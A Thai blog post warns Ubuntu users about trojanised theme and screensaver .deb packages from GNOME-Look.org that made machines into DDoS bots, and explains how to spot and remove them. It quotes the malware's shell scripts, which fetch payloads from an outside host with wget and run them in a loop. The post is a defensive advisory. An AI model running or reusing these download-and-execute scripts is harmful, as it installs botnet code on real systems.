เตือนภัย! Malware สำหรับ Ubuntu ออกมาเพ่นพ่านแล้ว


สำหรับผู้ใช้ Ubuntu (และ GNU/Linux อื่นๆ) ที่เคยคิดว่า OS ของตัวเอง “ปลอดภัย 100%” เลยย่ามใจชอบคลิกติดตั้งอะไรมั่วซั่ว (เขียนอะไรเนี่ย เข้าตัวเองหมดเลย😦 ) โปรดระวังตัว ตอนนี้เริ่มมีคนสนใจทำ Malware สำหรับ Ubuntu แล้ว และไม่ใช่ Virus ที่รันผ่าน WINE ด้วย คราวนี้ของจริง

เมื่อวานนี้ มีคนใน Ubuntuforums ว่าเจอพฤติกรรมแปลกๆ จากไฟล์ .deb ที่ดาวน์โหลดมาจาก GNOME-Look.org ไฟล์แรกเป็น Screensaver ชื่อ “Waterfall” ต่อมาก็พบไฟล์โจทย์อันที่สองคือ Theme ที่ใช้ชื่อว่า “Ninja” ทั้งสองไฟล์นี้แฝง code ประหลาดๆ เอาไว้แทนที่จะเป็นไฟล์ติดตั้ง Screensaver หรือ Theme อย่างที่อ้าง ลักษณะ code ที่มีคนแจ้งไว้ใน http://ubuntuforums.org/showthread.php?t=1349678 มีลักษณะดังนี้

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

ซึ่งจากการสืบค้นของ นักสืบ Pantip เอ๊ย ไม่ใช่ สมาชิกใน Ubuntuforums ก็พบว่า Script ทั้งหลายใน .deb package ดังกล่าวคือคำสั่งในการควบคุมเครื่องเหยื่อให้กลายเป็น bot สำหรับยิง DDoS ถ้าพูดกันง่ายๆ ตามภาษาของ OS ที่โดนเจาะจนพรุน (ซึ่งคุณก็รู้ว่าคือ OS อะไร) นี่คือไฟล์ Trojans สำหรับ Ubuntu นั่นเอง (และอาจจะมีผล GNU/Linux สาย Debian ตัวอื่นๆ ด้วย)

ถ้าเกิดมีคนไหนเผลอเอา Theme หรือ Screensaver ดังกล่าวมาลงไปแล้ว หรือ ไม่แน่ใจว่าเคยเผลอเอามาลงหรือเปล่า อย่าเพิ่งตกใจ เพราะวิธีแก้ไม่ยาก แค่รันคำสั่งข้างล่าง

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

แต่อย่าไปรันคำสั่งนี้มั่วซั่ว กรุณามั่นใจก่อนว่าเครื่องคุณมี Trojans ตัวนี้จริงๆ ลักษณะสังเกตก็ไม่น่าจะยาก ตั้งสติแล้วทบทวนดูว่า

  • คุณเคยลง Theme หรือ Screensaver ที่เป็น .deb แต่ไม่มีรายการโผล่ Theme หรือ Screensaver อันใหม่ขึ้นมาให้เลือกหรือเปล่า
  • ลองเช็คใน System Monitor ดูว่าเครื่องคุณมีการรันโปรแกรมหรือสคริปต์ประหลาดๆ ที่ไม่รู้จักหรือเปล่า
  • และสคริปต์ดังกล่าวไปเรียกดาวน์โหลดหรือยิง packets ไปที่ไหนหรือไม่
  • ลองหาดูว่ามีไฟล์ /usr/bin/Auto.bash, /usr/bin/run.bash, /etc/profile.d/gnome.sh เหล่านี้อยู่ในเครื่องหรือเปล่า ถ้ามีลองเปิดดู (เปิดกับ text editor นะ อย่าไปกด Run) ว่าข้างในมีลักษณะคล้ายๆ แบบนี้หรือไม่
while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

ถ้าทุกอย่างตรง โดยเฉพาะสองข้อหลัง ให้รู้ตัวไว้เลยว่าเครื่องคุณ “โดน” ซะแล้ว หลังจากรันคำสั่งแก้ไขแล้ว เพื่อความปลอดภัยขั้นสูงสุด ควรจะไปอ่านรายละเอียดจากกระทู้นี้ http://ubuntuforums.org/showthread.php?t=1349801 ใน Ubuntuforums ด้วย

ที่มา

  1. http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
  2. http://www.omgubuntu.co.uk/2009/12/yet-more-malware-found-on-gnome-look.html

    ป.ล. อ่านเรื่องนี้แล้ว อย่าเพิ่งด่วนสรุปว่า Linux ไม่ปลอดภัย เพราะว่านี่ไม่ใช่การเจาะผ่านช่องโหว่ของ OS หรือของโปรแกรมใดๆ ทั้งสิ้น แต่เป็นการเจาะผ่านช่องโหว่ตัวสำคัญในระบบ คือ… ผู้ใช้ นั่นเอง หรือจะเรียกว่าเป็น Social Engineering รูปแบบหนึ่งก็ได้ ซึ่งทุก OS ในโลกมีโอกาสโดนเจาะแบบนี้เท่าเทียมกันหมด

    ตรงกันข้าม อาจจะมองในอีกแง่ได้ด้วยว่า ธรรมชาติที่เป็น Open Source และชุมชนผู้ใช้เป็นสิ่งที่ทำให้ GNU/Linux OS แข็งแกร่งและปลอดภัยกว่า OS อื่นๆ ที่เป็น Closed source, Proprietary มากมาย เพราะการเผยแพร่ Source code ทำให้ผู้ใช้ทุกคนช่วยกันสอดส่องมองหาโปรแกรมที่ประพฤติตัวแปลกๆ ได้ ผลที่ได้ก็คือ ไม่ว่าจะเป็นช่องโหว่, malwares หรือ trojans สามารถถูกตรวจพบและแก้ไขได้อย่างรวดเร็ว เพื่อยืนยันความจริงข้อนี้ ผมขอบอกว่า ภายในเวลาไม่ถึง 24 ชั่วโมงนับจากมีคนตรวจพบ ไฟล์ทั้งสองได้ถูกลบออกจาก GNOME-Look.org เรียบร้อยโรงเรียนลินุกซ์ไปแล้ว

    หลังจากนี้ก็ต้องมาดูกันว่า เว็บ GNOME-Look.org และผองเพื่อนในเครือ Opendesktop.org จะมีมาตรการในการป้องกันการกระทำผิดลักษณะนี้อย่างไร

    3 Responses to เตือนภัย! Malware สำหรับ Ubuntu ออกมาเพ่นพ่านแล้ว

    1. Pingback: Tweets that mention เตือนภัย! Malware สำหรับ Ubuntu ออกมาเพ่นพ่านแล้ว « akedemo ชีวิตติดคอมฯ -- Topsy.com

    2. Aee says:

      ผมขอไปแปะใน ubuntuclub ด้วยนะครับ จะได้เป็นอุทาหรณ์
      ขอบคุณครับ

      • akedemo says:

        ผมเคยเห็นคุณ willwill นำข่าวเรื่องนี้ไปลงแล้วครับ ก่อนหน้าผมจะเขียนบล็อกซะอีก (วันที่เขียนโพสต์นี้ผมตื่นสาย)

        ขอบคุณครับที่ช่วยเผยแพร่ข่าว โลกของ GNU/Linux จะได้ปลอดภัยกันยิ่งๆ ขึ้นไป
        โอเพนซอร์สจงเจริญ!

    Leave a Reply

    Fill in your details below or click an icon to log in:

    WordPress.com Logo

    You are commenting using your WordPress.com account. Log Out / Change )

    Twitter picture

    You are commenting using your Twitter account. Log Out / Change )

    Facebook photo

    You are commenting using your Facebook account. Log Out / Change )

    Google+ photo

    You are commenting using your Google+ account. Log Out / Change )

    Connecting to %s

    %d bloggers like this: